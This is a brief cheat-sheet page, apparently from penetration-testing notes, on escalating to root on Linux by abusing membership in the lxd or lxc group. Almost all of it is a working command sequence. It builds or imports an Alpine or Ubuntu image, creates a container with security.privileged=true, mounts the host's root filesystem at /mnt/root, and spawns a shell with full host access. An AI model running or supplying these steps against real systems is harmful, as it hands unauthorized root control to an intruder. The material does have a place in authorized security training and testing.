lxc-and-lxd

Build a container image (no internet)

git clone https://github.com/saghul/lxd-alpine-builder

sudo ./build-alpine

If you face error (extended header keyword) lxd-alpine-builder issue

Start the lxd daemon

lxd init

Import the local image

lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine

Privilege set

lxc init alpine r00t -c security.privileged=true

Mount the system

lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true

Spawn the shell

lxc start r00t && lxc exec r00t /bin/sh && id

Containers

Linux daemon (LXD) is designed to contain a complete operating system. We must either the lxc or lxd group.

Import the image as a container

lxc image import ubuntu-template.tar.xz --alias ubuntutemp

lxc image  list

Configure image

lxc init ubuntutemp privesc -c security.privileged=true

lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

Start the container and login

lxc start privesc

lxc exec privesc /bin/bash

lxc exec privesc -- /bin/sh

ls -l /mnt/root

Last updated 1 day ago